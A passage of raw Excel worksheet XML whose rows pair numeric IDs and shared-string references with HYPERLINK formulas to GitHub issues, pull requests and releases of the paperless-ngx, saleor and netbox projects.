        <v>https://github.com/paperless-ngx/paperless-ngx/pull/24</v>
      </c>
    </row>
    <row r="86" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A86">
        <v>567</v>
      </c>
      <c r="B86" t="s">
        <v>697</v>
      </c>
      <c r="C86" t="s">
        <v>714</v>
      </c>
      <c r="D86" t="s">
        <v>162</v>
      </c>
      <c r="E86" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/41", "https://github.com/paperless-ngx/paperless-ngx/pull/41")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/41</v>
      </c>
    </row>
    <row r="87" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A87">
        <v>568</v>
      </c>
      <c r="B87" t="s">
        <v>715</v>
      </c>
      <c r="C87" t="s">
        <v>716</v>
      </c>
      <c r="D87" t="s">
        <v>162</v>
      </c>
      <c r="E87" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/41", "https://github.com/paperless-ngx/paperless-ngx/pull/41")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/41</v>
      </c>
    </row>
    <row r="88" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A88">
        <v>569</v>
      </c>
      <c r="B88" t="s">
        <v>610</v>
      </c>
      <c r="C88" t="s">
        <v>717</v>
      </c>
      <c r="D88" t="s">
        <v>162</v>
      </c>
      <c r="E88" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/41", "https://github.com/paperless-ngx/paperless-ngx/pull/41")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/41</v>
      </c>
    </row>
    <row r="89" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A89">
        <v>575</v>
      </c>
      <c r="B89" t="s">
        <v>718</v>
      </c>
      <c r="C89" t="s">
        <v>719</v>
      </c>
      <c r="D89" t="s">
        <v>162</v>
      </c>
      <c r="E89" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/2052", "https://github.com/paperless-ngx/paperless-ngx/issues/2052")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/2052</v>
      </c>
    </row>
    <row r="90" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A90">
        <v>618</v>
      </c>
      <c r="B90" t="s">
        <v>610</v>
      </c>
      <c r="C90" t="s">
        <v>720</v>
      </c>
      <c r="D90" t="s">
        <v>162</v>
      </c>
      <c r="E90" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/2287", "https://github.com/saleor/saleor/issues/2287")</f>
        <v>https://github.com/saleor/saleor/issues/2287</v>
      </c>
    </row>
    <row r="91" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A91">
        <v>625</v>
      </c>
      <c r="B91" t="s">
        <v>610</v>
      </c>
      <c r="C91" t="s">
        <v>721</v>
      </c>
      <c r="D91" t="s">
        <v>162</v>
      </c>
      <c r="E91" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/4397", "https://github.com/saleor/saleor/issues/4397")</f>
        <v>https://github.com/saleor/saleor/issues/4397</v>
      </c>
    </row>
    <row r="92" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A92">
        <v>628</v>
      </c>
      <c r="B92" t="s">
        <v>610</v>
      </c>
      <c r="C92" t="s">
        <v>722</v>
      </c>
      <c r="D92" t="s">
        <v>162</v>
      </c>
      <c r="E92" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/4653", "https://github.com/saleor/saleor/pull/4653")</f>
        <v>https://github.com/saleor/saleor/pull/4653</v>
      </c>
    </row>
    <row r="93" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A93">
        <v>635</v>
      </c>
      <c r="B93" t="s">
        <v>715</v>
      </c>
      <c r="C93" t="s">
        <v>723</v>
      </c>
      <c r="D93" t="s">
        <v>162</v>
      </c>
      <c r="E93" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/5648", "https://github.com/saleor/saleor/pull/5648")</f>
        <v>https://github.com/saleor/saleor/pull/5648</v>
      </c>
    </row>
    <row r="94" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A94">
        <v>636</v>
      </c>
      <c r="B94" t="s">
        <v>715</v>
      </c>
      <c r="C94" t="s">
        <v>724</v>
      </c>
      <c r="D94" t="s">
        <v>162</v>
      </c>
      <c r="E94" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/6117", "https://github.com/saleor/saleor/pull/6117")</f>
        <v>https://github.com/saleor/saleor/pull/6117</v>
      </c>
    </row>
    <row r="95" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A95">
        <v>639</v>
      </c>
      <c r="B95" t="s">
        <v>619</v>
      </c>
      <c r="C95" t="s">
        <v>725</v>
      </c>
      <c r="D95" t="s">
        <v>162</v>
      </c>
      <c r="E95" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/7663", "https://github.com/saleor/saleor/issues/7663")</f>
        <v>https://github.com/saleor/saleor/issues/7663</v>
      </c>
    </row>
    <row r="96" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A96">
        <v>640</v>
      </c>
      <c r="B96" t="s">
        <v>610</v>
      </c>
      <c r="C96" t="s">
        <v>725</v>
      </c>
      <c r="D96" t="s">
        <v>162</v>
      </c>
      <c r="E96" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/7663", "https://github.com/saleor/saleor/issues/7663")</f>
        <v>https://github.com/saleor/saleor/issues/7663</v>
      </c>
    </row>
    <row r="97" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A97">
        <v>641</v>
      </c>
      <c r="B97" t="s">
        <v>610</v>
      </c>
      <c r="C97" t="s">
        <v>726</v>
      </c>
      <c r="D97" t="s">
        <v>162</v>
      </c>
      <c r="E97" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/11648", "https://github.com/saleor/saleor/pull/11648")</f>
        <v>https://github.com/saleor/saleor/pull/11648</v>
      </c>
    </row>
    <row r="98" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A98">
        <v>644</v>
      </c>
      <c r="B98" t="s">
        <v>610</v>
      </c>
      <c r="C98" t="s">
        <v>727</v>
      </c>
      <c r="D98" t="s">
        <v>162</v>
      </c>
      <c r="E98" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/11887", "https://github.com/saleor/saleor/issues/11887")</f>
        <v>https://github.com/saleor/saleor/issues/11887</v>
      </c>
    </row>
    <row r="99" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A99">
        <v>645</v>
      </c>
      <c r="B99" t="s">
        <v>610</v>
      </c>
      <c r="C99" t="s">
        <v>728</v>
      </c>
      <c r="D99" t="s">
        <v>162</v>
      </c>
      <c r="E99" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/12040", "https://github.com/saleor/saleor/issues/12040")</f>
        <v>https://github.com/saleor/saleor/issues/12040</v>
      </c>
    </row>
    <row r="100" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A100">
        <v>648</v>
      </c>
      <c r="B100" t="s">
        <v>610</v>
      </c>
      <c r="C100" t="s">
        <v>729</v>
      </c>
      <c r="D100" t="s">
        <v>162</v>
      </c>
      <c r="E100" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/12041", "https://github.com/saleor/saleor/pull/12041")</f>
        <v>https://github.com/saleor/saleor/pull/12041</v>
      </c>
    </row>
    <row r="101" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A101">
        <v>650</v>
      </c>
      <c r="B101" t="s">
        <v>610</v>
      </c>
      <c r="C101" t="s">
        <v>730</v>
      </c>
      <c r="D101" t="s">
        <v>162</v>
      </c>
      <c r="E101" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/12108", "https://github.com/saleor/saleor/issues/12108")</f>
        <v>https://github.com/saleor/saleor/issues/12108</v>
      </c>
    </row>
    <row r="102" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A102">
        <v>651</v>
      </c>
      <c r="B102" t="s">
        <v>610</v>
      </c>
      <c r="C102" t="s">
        <v>731</v>
      </c>
      <c r="D102" t="s">
        <v>162</v>
      </c>
      <c r="E102" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/12348", "https://github.com/saleor/saleor/issues/12348")</f>
        <v>https://github.com/saleor/saleor/issues/12348</v>
      </c>
    </row>
    <row r="103" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A103">
        <v>656</v>
      </c>
      <c r="B103" t="s">
        <v>610</v>
      </c>
      <c r="C103" t="s">
        <v>732</v>
      </c>
      <c r="D103" t="s">
        <v>162</v>
      </c>
      <c r="E103" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/12349", "https://github.com/saleor/saleor/pull/12349")</f>
        <v>https://github.com/saleor/saleor/pull/12349</v>
      </c>
    </row>
    <row r="104" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A104">
        <v>658</v>
      </c>
      <c r="B104" t="s">
        <v>610</v>
      </c>
      <c r="C104" t="s">
        <v>733</v>
      </c>
      <c r="D104" t="s">
        <v>162</v>
      </c>
      <c r="E104" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/12539", "https://github.com/saleor/saleor/issues/12539")</f>
        <v>https://github.com/saleor/saleor/issues/12539</v>
      </c>
    </row>
    <row r="105" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A105">
        <v>661</v>
      </c>
      <c r="B105" t="s">
        <v>610</v>
      </c>
      <c r="C105" t="s">
        <v>734</v>
      </c>
      <c r="D105" t="s">
        <v>162</v>
      </c>
      <c r="E105" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/15275", "https://github.com/saleor/saleor/pull/15275")</f>
        <v>https://github.com/saleor/saleor/pull/15275</v>
      </c>
    </row>
    <row r="106" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A106">
        <v>662</v>
      </c>
      <c r="B106" t="s">
        <v>610</v>
      </c>
      <c r="C106" t="s">
        <v>735</v>
      </c>
      <c r="D106" t="s">
        <v>162</v>
      </c>
      <c r="E106" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/15288", "https://github.com/saleor/saleor/pull/15288")</f>
        <v>https://github.com/saleor/saleor/pull/15288</v>
      </c>
    </row>
    <row r="107" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A107">
        <v>666</v>
      </c>
      <c r="B107" t="s">
        <v>715</v>
      </c>
      <c r="C107" t="s">
        <v>736</v>
      </c>
      <c r="D107" t="s">
        <v>162</v>
      </c>
      <c r="E107" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16044", "https://github.com/saleor/saleor/pull/16044")</f>
        <v>https://github.com/saleor/saleor/pull/16044</v>
      </c>
    </row>
    <row r="108" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A108">
        <v>671</v>
      </c>
      <c r="B108" t="s">
        <v>697</v>
      </c>
      <c r="C108" t="s">
        <v>737</v>
      </c>
      <c r="D108" t="s">
        <v>162</v>
      </c>
      <c r="E108" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16410", "https://github.com/saleor/saleor/pull/16410")</f>
        <v>https://github.com/saleor/saleor/pull/16410</v>
      </c>
    </row>
    <row r="109" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A109">
        <v>672</v>
      </c>
      <c r="B109" t="s">
        <v>738</v>
      </c>
      <c r="C109" t="s">
        <v>737</v>
      </c>
      <c r="D109" t="s">
        <v>162</v>
      </c>
      <c r="E109" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16410", "https://github.com/saleor/saleor/pull/16410")</f>
        <v>https://github.com/saleor/saleor/pull/16410</v>
      </c>
    </row>
    <row r="110" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A110">
        <v>673</v>
      </c>
      <c r="B110" t="s">
        <v>697</v>
      </c>
      <c r="C110" t="s">
        <v>739</v>
      </c>
      <c r="D110" t="s">
        <v>162</v>
      </c>
      <c r="E110" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16424", "https://github.com/saleor/saleor/pull/16424")</f>
        <v>https://github.com/saleor/saleor/pull/16424</v>
      </c>
    </row>
    <row r="111" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A111">
        <v>674</v>
      </c>
      <c r="B111" t="s">
        <v>697</v>
      </c>
      <c r="C111" t="s">
        <v>739</v>
      </c>
      <c r="D111" t="s">
        <v>162</v>
      </c>
      <c r="E111" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16425", "https://github.com/saleor/saleor/pull/16425")</f>
        <v>https://github.com/saleor/saleor/pull/16425</v>
      </c>
    </row>
    <row r="112" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A112">
        <v>675</v>
      </c>
      <c r="B112" t="s">
        <v>697</v>
      </c>
      <c r="C112" t="s">
        <v>739</v>
      </c>
      <c r="D112" t="s">
        <v>162</v>
      </c>
      <c r="E112" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16426", "https://github.com/saleor/saleor/pull/16426")</f>
        <v>https://github.com/saleor/saleor/pull/16426</v>
      </c>
    </row>
    <row r="113" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A113">
        <v>676</v>
      </c>
      <c r="B113" t="s">
        <v>697</v>
      </c>
      <c r="C113" t="s">
        <v>739</v>
      </c>
      <c r="D113" t="s">
        <v>162</v>
      </c>
      <c r="E113" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16427", "https://github.com/saleor/saleor/pull/16427")</f>
        <v>https://github.com/saleor/saleor/pull/16427</v>
      </c>
    </row>
    <row r="114" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A114">
        <v>677</v>
      </c>
      <c r="B114" t="s">
        <v>697</v>
      </c>
      <c r="C114" t="s">
        <v>739</v>
      </c>
      <c r="D114" t="s">
        <v>162</v>
      </c>
      <c r="E114" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16428", "https://github.com/saleor/saleor/pull/16428")</f>
        <v>https://github.com/saleor/saleor/pull/16428</v>
      </c>
    </row>
    <row r="115" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A115">
        <v>678</v>
      </c>
      <c r="B115" t="s">
        <v>697</v>
      </c>
      <c r="C115" t="s">
        <v>739</v>
      </c>
      <c r="D115" t="s">
        <v>162</v>
      </c>
      <c r="E115" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16429", "https://github.com/saleor/saleor/pull/16429")</f>
        <v>https://github.com/saleor/saleor/pull/16429</v>
      </c>
    </row>
    <row r="116" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A116">
        <v>679</v>
      </c>
      <c r="B116" t="s">
        <v>697</v>
      </c>
      <c r="C116" t="s">
        <v>739</v>
      </c>
      <c r="D116" t="s">
        <v>162</v>
      </c>
      <c r="E116" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16430", "https://github.com/saleor/saleor/pull/16430")</f>
        <v>https://github.com/saleor/saleor/pull/16430</v>
      </c>
    </row>
    <row r="117" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A117">
        <v>681</v>
      </c>
      <c r="B117" t="s">
        <v>610</v>
      </c>
      <c r="C117" t="s">
        <v>740</v>
      </c>
      <c r="D117" t="s">
        <v>162</v>
      </c>
      <c r="E117" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/17004", "https://github.com/saleor/saleor/pull/17004")</f>
        <v>https://github.com/saleor/saleor/pull/17004</v>
      </c>
    </row>
    <row r="118" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A118">
        <v>684</v>
      </c>
      <c r="B118" t="s">
        <v>610</v>
      </c>
      <c r="C118" t="s">
        <v>741</v>
      </c>
      <c r="D118" t="s">
        <v>162</v>
      </c>
      <c r="E118" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/17024", "https://github.com/saleor/saleor/pull/17024")</f>
        <v>https://github.com/saleor/saleor/pull/17024</v>
      </c>
    </row>
    <row r="119" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A119">
        <v>687</v>
      </c>
      <c r="B119" t="s">
        <v>610</v>
      </c>
      <c r="C119" t="s">
        <v>742</v>
      </c>
      <c r="D119" t="s">
        <v>162</v>
      </c>
      <c r="E119" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/17031", "https://github.com/saleor/saleor/pull/17031")</f>
        <v>https://github.com/saleor/saleor/pull/17031</v>
      </c>
    </row>
    <row r="120" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A120">
        <v>700</v>
      </c>
      <c r="B120" t="s">
        <v>610</v>
      </c>
      <c r="C120" t="s">
        <v>743</v>
      </c>
      <c r="D120" t="s">
        <v>402</v>
      </c>
      <c r="E120" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/releases/tag/3.20.51", "https://github.com/saleor/saleor/releases/tag/3.20.51")</f>
        <v>https://github.com/saleor/saleor/releases/tag/3.20.51</v>
      </c>
    </row>
    <row r="121" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A121">
        <v>703</v>
      </c>
      <c r="B121" t="s">
        <v>744</v>
      </c>
      <c r="C121" t="s">
        <v>745</v>
      </c>
      <c r="D121" t="s">
        <v>402</v>
      </c>
      <c r="E121" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/releases/tag/3.19.44", "https://github.com/saleor/saleor/releases/tag/3.19.44")</f>
        <v>https://github.com/saleor/saleor/releases/tag/3.19.44</v>
      </c>
    </row>
    <row r="122" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A122">
        <v>704</v>
      </c>
      <c r="B122" t="s">
        <v>610</v>
      </c>
      <c r="C122" t="s">
        <v>746</v>
      </c>
      <c r="D122" t="s">
        <v>402</v>
      </c>
      <c r="E122" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/releases/tag/3.18.12", "https://github.com/saleor/saleor/releases/tag/3.18.12")</f>
        <v>https://github.com/saleor/saleor/releases/tag/3.18.12</v>
      </c>
    </row>
    <row r="123" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A123">
        <v>706</v>
      </c>
      <c r="B123" t="s">
        <v>610</v>
      </c>
      <c r="C123" t="s">
        <v>747</v>
      </c>
      <c r="D123" t="s">
        <v>402</v>
      </c>
      <c r="E123" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/releases/tag/3.12.0", "https://github.com/saleor/saleor/releases/tag/3.12.0")</f>
        <v>https://github.com/saleor/saleor/releases/tag/3.12.0</v>
      </c>
    </row>
    <row r="124" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A124">
        <v>732</v>
      </c>
      <c r="B124" t="s">
        <v>642</v>
      </c>
      <c r="C124" t="s">
        <v>748</v>
      </c>
      <c r="D124" t="s">
        <v>10</v>
      </c>
      <c r="E124" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/10319", "https://github.com/paperless-ngx/paperless-ngx/pull/10319")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/10319</v>
      </c>
    </row>
    <row r="125" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A125">
        <v>733</v>
      </c>
      <c r="B125" t="s">
        <v>715</v>
      </c>
      <c r="C125" t="s">
        <v>749</v>
      </c>
      <c r="D125" t="s">
        <v>10</v>
      </c>
      <c r="E125" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/10319", "https://github.com/paperless-ngx/paperless-ngx/pull/10319")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/10319</v>
      </c>
    </row>
    <row r="126" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A126">
        <v>748</v>
      </c>
      <c r="B126" t="s">
        <v>610</v>
      </c>
      <c r="C126" t="s">
        <v>750</v>
      </c>
      <c r="D126" t="s">
        <v>10</v>
      </c>
      <c r="E126" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/536", "https://github.com/saleor/saleor/issues/536")</f>
        <v>https://github.com/saleor/saleor/issues/536</v>
      </c>
    </row>
    <row r="127" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A127">
        <v>753</v>
      </c>
      <c r="B127" t="s">
        <v>715</v>
      </c>
      <c r="C127" t="s">
        <v>751</v>
      </c>
      <c r="D127" t="s">
        <v>10</v>
      </c>
      <c r="E127" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/1872", "https://github.com/saleor/saleor/issues/1872")</f>
        <v>https://github.com/saleor/saleor/issues/1872</v>
      </c>
    </row>
    <row r="128" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A128">
        <v>757</v>
      </c>
      <c r="B128" t="s">
        <v>642</v>
      </c>
      <c r="C128" t="s">
        <v>752</v>
      </c>
      <c r="D128" t="s">
        <v>10</v>
      </c>
      <c r="E128" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/3808", "https://github.com/saleor/saleor/pull/3808")</f>
        <v>https://github.com/saleor/saleor/pull/3808</v>
      </c>
    </row>
    <row r="129" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A129">
        <v>759</v>
      </c>
      <c r="B129" t="s">
        <v>697</v>
      </c>
      <c r="C129" t="s">
        <v>753</v>
      </c>
      <c r="D129" t="s">
        <v>10</v>
      </c>
      <c r="E129" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/5648", "https://github.com/saleor/saleor/pull/5648")</f>
        <v>https://github.com/saleor/saleor/pull/5648</v>
      </c>
    </row>
    <row r="130" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A130">
        <v>761</v>
      </c>
      <c r="B130" t="s">
        <v>612</v>
      </c>
      <c r="C130" t="s">
        <v>754</v>
      </c>
      <c r="D130" t="s">
        <v>10</v>
      </c>
      <c r="E130" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/5703", "https://github.com/saleor/saleor/issues/5703")</f>
        <v>https://github.com/saleor/saleor/issues/5703</v>
      </c>
    </row>
    <row r="131" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A131">
        <v>763</v>
      </c>
      <c r="B131" t="s">
        <v>715</v>
      </c>
      <c r="C131" t="s">
        <v>755</v>
      </c>
      <c r="D131" t="s">
        <v>10</v>
      </c>
      <c r="E131" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/8463", "https://github.com/saleor/saleor/pull/8463")</f>
        <v>https://github.com/saleor/saleor/pull/8463</v>
      </c>
    </row>
    <row r="132" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A132">
        <v>764</v>
      </c>
      <c r="B132" t="s">
        <v>715</v>
      </c>
      <c r="C132" t="s">
        <v>755</v>
      </c>
      <c r="D132" t="s">
        <v>10</v>
      </c>
      <c r="E132" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/8555", "https://github.com/saleor/saleor/pull/8555")</f>
        <v>https://github.com/saleor/saleor/pull/8555</v>
      </c>
    </row>
    <row r="133" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A133">
        <v>766</v>
      </c>
      <c r="B133" t="s">
        <v>610</v>
      </c>
      <c r="C133" t="s">
        <v>756</v>
      </c>
      <c r="D133" t="s">
        <v>10</v>
      </c>
      <c r="E133" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/12284", "https://github.com/saleor/saleor/pull/12284")</f>
        <v>https://github.com/saleor/saleor/pull/12284</v>
      </c>
    </row>
    <row r="134" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A134">
        <v>774</v>
      </c>
      <c r="B134" t="s">
        <v>757</v>
      </c>
      <c r="C134" t="s">
        <v>758</v>
      </c>
      <c r="D134" t="s">
        <v>10</v>
      </c>
      <c r="E134" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/13064", "https://github.com/saleor/saleor/issues/13064")</f>
        <v>https://github.com/saleor/saleor/issues/13064</v>
      </c>
    </row>
    <row r="135" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A135">
        <v>780</v>
      </c>
      <c r="B135" t="s">
        <v>610</v>
      </c>
      <c r="C135" t="s">
        <v>759</v>
      </c>
      <c r="D135" t="s">
        <v>10</v>
      </c>
      <c r="E135" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/14846", "https://github.com/saleor/saleor/pull/14846")</f>
        <v>https://github.com/saleor/saleor/pull/14846</v>
      </c>
    </row>
    <row r="136" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A136">
        <v>781</v>
      </c>
      <c r="B136" t="s">
        <v>610</v>
      </c>
      <c r="C136" t="s">
        <v>760</v>
      </c>
      <c r="D136" t="s">
        <v>10</v>
      </c>
      <c r="E136" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/16273", "https://github.com/saleor/saleor/issues/16273")</f>
        <v>https://github.com/saleor/saleor/issues/16273</v>
      </c>
    </row>
    <row r="137" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A137">
        <v>787</v>
      </c>
      <c r="B137" t="s">
        <v>668</v>
      </c>
      <c r="C137" t="s">
        <v>761</v>
      </c>
      <c r="D137" t="s">
        <v>10</v>
      </c>
      <c r="E137" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/982", "https://github.com/netbox-community/netbox/issues/982")</f>
        <v>https://github.com/netbox-community/netbox/issues/982</v>
      </c>
    </row>
    <row r="138" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A138">
        <v>790</v>
      </c>
      <c r="B138" t="s">
        <v>701</v>
      </c>
      <c r="C138" t="s">
        <v>762</v>
      </c>
      <c r="D138" t="s">
        <v>10</v>
      </c>
      <c r="E138" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/1099", "https://github.com/netbox-community/netbox/issues/1099")</f>
        <v>https://github.com/netbox-community/netbox/issues/1099</v>
      </c>
    </row>
    <row r="139" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A139">
        <v>795</v>
      </c>
      <c r="B139" t="s">
        <v>642</v>
      </c>
      <c r="C139" t="s">
        <v>763</v>
      </c>
      <c r="D139" t="s">
        <v>10</v>
      </c>
      <c r="E139" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/3401", "https://github.com/netbox-community/netbox/issues/3401")</f>
        <v>https://github.com/netbox-community/netbox/issues/3401</v>
      </c>
    </row>
    <row r="140" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A140">
        <v>817</v>
      </c>
      <c r="B140" t="s">
        <v>610</v>
      </c>
      <c r="C140" t="s">
        <v>764</v>
      </c>
      <c r="D140" t="s">
        <v>10</v>
      </c>
      <c r="E140" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7937", "https://github.com/netbox-community/netbox/issues/7937")</f>
        <v>https://github.com/netbox-community/netbox/issues/7937</v>
      </c>
    </row>
    <row r="141" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A141">
        <v>818</v>
      </c>
      <c r="B141" t="s">
        <v>610</v>
      </c>
      <c r="C141" t="s">
        <v>765</v>
      </c>
      <c r="D141" t="s">
        <v>10</v>
      </c>
      <c r="E141" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/8232", "https://github.com/netbox-community/netbox/issues/8232")</f>
        <v>https://github.com/netbox-community/netbox/issues/8232</v>
      </c>
    </row>
    <row r="142" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A142">
        <v>822</v>
      </c>
      <c r="B142" t="s">
        <v>610</v>
      </c>
      <c r="C142" t="s">
        <v>766</v>
      </c>
      <c r="D142" t="s">
        <v>10</v>
      </c>
      <c r="E142" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/9871", "https://github.com/netbox-community/netbox/issues/9871")</f>
        <v>https://github.com/netbox-community/netbox/issues/9871</v>
      </c>
    </row>
    <row r="143" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A143">
        <v>823</v>
      </c>
      <c r="B143" t="s">
        <v>610</v>
      </c>
      <c r="C143" t="s">
        <v>767</v>
      </c>
      <c r="D143" t="s">
        <v>10</v>
      </c>
      <c r="E143" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/10445", "https://github.com/netbox-community/netbox/issues/10445")</f>
        <v>https://github.com/netbox-community/netbox/issues/10445</v>
      </c>
    </row>
    <row r="144" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A144">
        <v>825</v>
      </c>
      <c r="B144" t="s">
        <v>612</v>
      </c>
      <c r="C144" t="s">
        <v>768</v>
      </c>
      <c r="D144" t="s">
        <v>10</v>
      </c>
      <c r="E144" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/11209", "https://github.com/netbox-community/netbox/issues/11209")</f>
        <v>https://github.com/netbox-community/netbox/issues/11209</v>
      </c>
    </row>
    <row r="145" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A145">
        <v>827</v>
      </c>
      <c r="B145" t="s">
        <v>610</v>
      </c>
      <c r="C145" t="s">
        <v>769</v>
      </c>
      <c r="D145" t="s">
        <v>10</v>
      </c>
      <c r="E145" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/13183", "https://github.com/netbox-community/netbox/issues/13183")</f>
        <v>https://github.com/netbox-community/netbox/issues/13183</v>
      </c>
    </row>
    <row r="146" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A146">
        <v>828</v>
      </c>
      <c r="B146" t="s">
        <v>639</v>
      </c>
      <c r="C146" t="s">
        <v>770</v>
      </c>
      <c r="D146" t="s">
        <v>10</v>
      </c>
      <c r="E146" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/13458", "https://github.com/netbox-community/netbox/issues/13458")</f>
        <v>https://github.com/netbox-community/netbox/issues/13458</v>
